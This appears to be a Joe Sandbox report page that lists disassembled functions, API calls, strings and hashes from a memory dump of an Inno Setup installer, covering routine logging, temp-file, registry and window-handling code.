Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B380CreateFontIndirectObjectSelect
String ID: ...\
API String ID: 1304862298-983595016
Opcode ID: 3c17e9b259d45102cf2c493247704ee487ce6a76f6b5ddcb32572202881f036b
Instruction ID: 8cb0686a906b0fecfa73e9aecb4ef0f18aed98045c6f9abe75b37b1c3a9d5cc0
Opcode Fuzzy Hash: 3c17e9b259d45102cf2c493247704ee487ce6a76f6b5ddcb32572202881f036b
Instruction Fuzzy Hash: 29316270B00129AFDF15EBAAD841BAEB7F8EB48304F90447BF400A7291D7789E41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00455B64 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

Part of subcall function 00450120: WriteFile.KERNEL32(?,?,00000000,00450352,00000000,00000000,?,?,?,00450352,00000000,00452881,?,0048B721,00000000,00452922), ref: 00450137

Strings

*cE, xrefs: 00455CCD, 00455C0C, 00455C50, 00455C5C, 00455C69, 00455C1F, 00455C2E
%.4u-%.2u-%.2u %.2u:%.2u:%.2u , xrefs: 00455BF5
, xrefs: 00455C42

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FileLocalTimeWrite
String ID: $%.4u-%.2u-%.2u %.2u:%.2u:%.2u $*cE
API String ID: 1093383541-807682747
Opcode ID: c2f38518e0a55e0eecc5abd5a429387f84ae3054397d0a343a044653de0c8ad1
Instruction ID: 196cb984fafb3917f2dd800caca8b552f4554cced74b5b27b2932311db97b8e6
Opcode Fuzzy Hash: c2f38518e0a55e0eecc5abd5a429387f84ae3054397d0a343a044653de0c8ad1
Instruction Fuzzy Hash: 6D419F70D04A489FDB11DFA9C9617BEBBF4EB09305F10406AF900A7392D7395E48CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0045593C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(004770CC,00000000,00455AA9,?,?,00000000,00000000,00000000), ref: 0045597D

Strings

Log opened., xrefs: 00455A7C
%.4u-%.2u-%.2u, xrefs: 004559AF
%s Log %s #%.3u.txt, xrefs: 004559EA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: LocalTime
String ID: %.4u-%.2u-%.2u$%s Log %s #%.3u.txt$Log opened.
API String ID: 481472006-3806465849
Opcode ID: 4c65395756873fa8bf238fa11bfeb6aaaff53c2e26898d0b82eb73a5467b8d8b
Instruction ID: 48786d344afea8f2d67796125104a5aaff5ad981458d5bce5972633b0ec6ecc8
Opcode Fuzzy Hash: 4c65395756873fa8bf238fa11bfeb6aaaff53c2e26898d0b82eb73a5467b8d8b
Instruction Fuzzy Hash: DC413AB0D00608AEDB00DFA9D8917EEBBF5EB49304F50416AE800A7291D7795E45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0045229C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045238B
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045239B

Strings

_iu, xrefs: 0045232D
.tmp, xrefs: 0045233F

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseHandle
String ID: .tmp$_iu
API String ID: 2962429428-10593223
Opcode ID: df51f71b4a8b0bd7ac59e239d24441b071503c96b211b47315574063d78003d8
Instruction ID: 88c0cc572b97f44d35eecdcba92444d0f4aae10aa7095f3427b1f2e7aa4c4a68
Opcode Fuzzy Hash: df51f71b4a8b0bd7ac59e239d24441b071503c96b211b47315574063d78003d8
Instruction Fuzzy Hash: DB31A771A00209ABCB10EBA5D942B9EBBB5AF05314F60417BF810B72D2D77C6F04965C

Uniqueness

Uniqueness Score: -1.00%

Function 00485EFC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 92registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegCloseKey.ADVAPI32(?,00485FFA,?,?,00000001,00000000,00000000,00486015), ref: 00485FE3

Strings

%s\%s_is1, xrefs: 00485F74
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00485F56
Inno Setup CodeFile: , xrefs: 00485FA6

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790
String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 3513276378-1837835967
Opcode ID: 8b25c034a0cfe78157112a762a586655f957c51a2c88e09446e8d8352b0e5f39
Instruction ID: 09a24dc8a6022d5224bb5964ae29029ace2ab20c18b37fce72d54143bfae8cca
Opcode Fuzzy Hash: 8b25c034a0cfe78157112a762a586655f957c51a2c88e09446e8d8352b0e5f39
Instruction Fuzzy Hash: BB319470A046045FDB11EFA9CC51A9EBBF8EB49304F51487BE900E7391D778AD01CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004164D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32 ref: 00416547
UnregisterClassA.USER32 ref: 00416573
RegisterClassA.USER32 ref: 00416596

Strings

@, xrefs: 004164F1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: b67c5cc82690fe361babc8edb18181d8eae429c121283e35cc21930cc69649ae
Instruction ID: 9b7ab25393498a186c60df35d444c5d8236ba3ba9485b5c728226e4dc42ec28e
Opcode Fuzzy Hash: b67c5cc82690fe361babc8edb18181d8eae429c121283e35cc21930cc69649ae
Instruction Fuzzy Hash: 14316B706043418BCB20EFA9C58179A7BE6AF44308F00857EF945DB396DB39D944CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0048A9E8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 0042438C: SetWindowTextA.USER32(?,00000000), ref: 004243A4

ShowWindow.USER32(?,00000005,00000000,0048AC17,?,?,00000000), ref: 0048AA1E

Part of subcall function 0042D80C: GetSystemDirectoryA.KERNEL32 ref: 0042D81F

Part of subcall function 0040733C: SetCurrentDirectoryA.KERNEL32(00000000,?,0048AA46,00000000,0048ABE3,?,?,00000005,00000000,0048AC17,?,?,00000000), ref: 00407347

Part of subcall function 0042D394: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D41F,?,?,00000000,?,?,0048AA50,00000000,0048ABE3,?,?,00000005), ref: 0042D3C9

Part of subcall function 0044FF00: GetFileSize.KERNEL32(?,00000004,00000000,?,0048AA96,00000000,0048AB11,?,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005), ref: 0044FF0E
Part of subcall function 0044FF00: GetLastError.KERNEL32(?,00000004,00000000,?,0048AA96,00000000,0048AB11,?,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005), ref: 0044FF1A

Strings

IMsg, xrefs: 0048AAB4
Uninstall, xrefs: 0048AA04
.msg, xrefs: 0048AAC0

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: DirectoryFileWindow$CurrentErrorLastModuleNameShowSizeSystemText
String ID: .msg$IMsg$Uninstall
API String ID: 2328437465-3145681768
Opcode ID: 50c59b26dbb9911a90d6963744d61b4da2a2a7cc0bee2a413e1b1af889ed0d1b
Instruction ID: 584b95c17cc84f27c3ed830320dbd0fb8aaeb6f21ec15bc102c40b1ff57954fc
Opcode Fuzzy Hash: 50c59b26dbb9911a90d6963744d61b4da2a2a7cc0bee2a413e1b1af889ed0d1b
Instruction Fuzzy Hash: 71319234B00204AFDB00FF6ADC92A5E7775EB49704F90487BF900AB692D678AD14CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044FBCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 0044FC30
SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FC72
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FCA3

Strings

open, xrefs: 0044FC96

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MessageSend$ExecuteShell
String ID: open
API String ID: 2179883421-2758837156
Opcode ID: 8663942d2fe6c78e8e9c1a1681af3218b326b201a91c5666012a1aad4d1f2aec
Instruction ID: f001f1e600aeaa1ffd1e9368b93cc3e88efae04158a7ae8f82051d1731785f76
Opcode Fuzzy Hash: 8663942d2fe6c78e8e9c1a1681af3218b326b201a91c5666012a1aad4d1f2aec
Instruction Fuzzy Hash: AB214470E40208AFDB14EF65CC82B9EB7B8EF44715F10857BB905A72D1D6789A458A48

Uniqueness

Uniqueness Score: -1.00%

Function 0048ADC8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

6CF478A0.KERNEL32(00000000,0048B721,00000000,0048AEBE,?,?,00000000,0048D628), ref: 0048AE38
6CAD69D0.KERNEL32(00000000,00000000,00000000,0048B721,00000000,0048AEBE,?,?,00000000,0048D628), ref: 0048AE61
6CAD6100.KERNEL32(00000000,00000000,00000001,00000000,0048B721,00000000,0048AEBE,?,?,00000000,0048D628), ref: 0048AE7A

Strings

isRS-%.3u.tmp, xrefs: 0048AE17

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D6100F478
String ID: isRS-%.3u.tmp
API String ID: 2827116437-3657609586
Opcode ID: ffd9d71aef5311753b9aa853d672d6d1a56f0c91ee8291c6b414bf17d3b9d56b
Instruction ID: e3fd0e415be7f1d885ee4f710042870f87f921b7d752074c4af07eef08411aa6
Opcode Fuzzy Hash: ffd9d71aef5311753b9aa853d672d6d1a56f0c91ee8291c6b414bf17d3b9d56b
Instruction Fuzzy Hash: 31216471D00209AFDB04FFA9C881AAFBBB9AB44314F50497BF814B32D1D7786E018B59

Uniqueness

Uniqueness Score: -1.00%

Function 00454DEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840

Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454E40
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454E6D

Strings

RegisterTypeLib, xrefs: 00454E78
LoadTypeLib, xrefs: 00454E4B

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: fad32255ec39f5bddde890893f74128ee5b3acd24eff5cd1baab6cb26e04de26
Instruction ID: 89998c4ba19b6db8449fe49ef93fc7c2fb0fa489f5eca5cd6002afcee5c7eb12
Opcode Fuzzy Hash: fad32255ec39f5bddde890893f74128ee5b3acd24eff5cd1baab6cb26e04de26
Instruction Fuzzy Hash: 6111B134B00204AFDB11EFA6CC52A4FB7BDEB89709F108476FD04D7652DA388A44C658

Uniqueness

Uniqueness Score: -1.00%

Function 00456880 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

LoadCursorA.USER32 ref: 004568E8
SetCursor.USER32(00000000,00000000,00007F02,00000000,004569C4,?,?,00000000,0048D628), ref: 004568EE

Part of subcall function 00456300: CloseHandle.KERNEL32(00000000), ref: 00456330
Part of subcall function 00456300: WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045635A
Part of subcall function 00456300: GetExitCodeProcess.KERNEL32 ref: 0045636A
Part of subcall function 00456300: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563B0
Part of subcall function 00456300: Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563C9

Part of subcall function 00456300: TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 0045634D

SetCursor.USER32(00000000,0045693F,00000000,00000000,00007F02,00000000,004569C4,?,?,00000000,0048D628), ref: 00456932

Strings

4H, xrefs: 004568D2

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Cursor$CloseHandleProcess$CodeExitLoadObjectSingleSleepTerminateWait
String ID: 4H
API String ID: 268187739-4226881615
Opcode ID: a44efd9e20f5c45914bd30db5dc309204793f1cee191b25ddb53e94e0834ea89
Instruction ID: 67851fd25c856857a5c091ab00770f849a5380ad850a705b1c67ecbc94730733
Opcode Fuzzy Hash: a44efd9e20f5c45914bd30db5dc309204793f1cee191b25ddb53e94e0834ea89
Instruction Fuzzy Hash: C311CA70B143406FD701BFBA8C5265E7BA9EB49704F8288BFB905D37C2D63C88099B19

Uniqueness

Uniqueness Score: -1.00%

Function 00467170 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00467178
FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 00467187

Strings

%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 004671FC
(invalid), xrefs: 0046720A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: e5330b616a1db92e1b923fb42046a1647c40c72cc7645d2c59cbf14929901b6f
Instruction ID: 040e7b09d3ea61fe1a2163efa5d8bd8610466462e14d6e1d46c8e3a29e771093
Opcode Fuzzy Hash: e5330b616a1db92e1b923fb42046a1647c40c72cc7645d2c59cbf14929901b6f
Instruction Fuzzy Hash: CA1103A040C3919ED340CF6A845072BBAE4ABC9718F44496EF9D8D6381E77DC948DB77

Uniqueness

Uniqueness Score: -1.00%

Function 00452832 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

6CAD69D0.KERNEL32(00000000,00000020), ref: 0045283F

Part of subcall function 00406FE4: 6CAD5F60.KERNEL32(00000000,0048D628,0048B356,00000000,0048B3AB,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406FEF

6CAD6060.KERNEL32(00000000,00000000,00000000,00000020), ref: 00452864

Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68

Strings

DeleteFile, xrefs: 00452850
MoveFile, xrefs: 0045286D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D6060ErrorLast
String ID: DeleteFile$MoveFile
API String ID: 581812409-139070271
Opcode ID: 4322ea0ae6c7c29bca73c1464b3547e578e0cc1b6bec92805596b4911c6f8057
Instruction ID: 8f616a6be6905109681539d72543d9f9618ef45f44fc752795df2394f3282eaf
Opcode Fuzzy Hash: 4322ea0ae6c7c29bca73c1464b3547e578e0cc1b6bec92805596b4911c6f8057
Instruction Fuzzy Hash: B5F06D717041056AE700FBA6DD42BAE67E8EB4530AF60443BFC04A3293EA7C9D09852C

Uniqueness

Uniqueness Score: -1.00%

Function 004783A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004783E1
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00478404

Strings

System\CurrentControlSet\Control\Windows, xrefs: 004783AE
CSDVersion, xrefs: 004783D8

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790QueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 2325164195-1910633163
Opcode ID: f9b57a2cfb8dc9af6dc7d52a461c6cea895f1a241a33be6a6420614682ac17e1
Instruction ID: ebd8b9a797716e03103ab54bad31a22caa8a2566d27fddc08f785aad15fb8c36
Opcode Fuzzy Hash: f9b57a2cfb8dc9af6dc7d52a461c6cea895f1a241a33be6a6420614682ac17e1
Instruction Fuzzy Hash: 18F04975E40209A6DF10D6D18C49BDF73BC9B04714F1085ABE518E7281FA789A058B59

Uniqueness

Uniqueness Score: -1.00%

Function 0042D838 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,0045253A,00000000,004525DD,?,?,00000000,00000000,00000000,00000000,00000000,?,004528A9,00000000), ref: 0042D852
6CAD5550.KERNEL32(00000000,kernel32.dll,GetSystemWow64DirectoryA,?,0045253A,00000000,004525DD,?,?,00000000,00000000,00000000,00000000,00000000,?,004528A9), ref: 0042D858

Strings

GetSystemWow64DirectoryA, xrefs: 0042D848
kernel32.dll, xrefs: 0042D84D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550HandleModule
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 920177481-4063490227
Opcode ID: 65fc8540a33f14b19a2b60b840795894bc427e8aebf8dfd69cf8a53384edfe8d
Instruction ID: 2f3886f1a94a038449d10b3498d7127d8e9797a980d43385655fd77ae546b746
Opcode Fuzzy Hash: 65fc8540a33f14b19a2b60b840795894bc427e8aebf8dfd69cf8a53384edfe8d
Instruction Fuzzy Hash: 0FE02630F40B5422D31075BA1C8376F118D4B84764FA0053F7AA4E63C2EDBCCA400A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0048B568 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B572
6CAD5550.KERNEL32(00000000,user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B578

Strings

DisableProcessWindowsGhosting, xrefs: 0048B568
user32.dll, xrefs: 0048B56D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
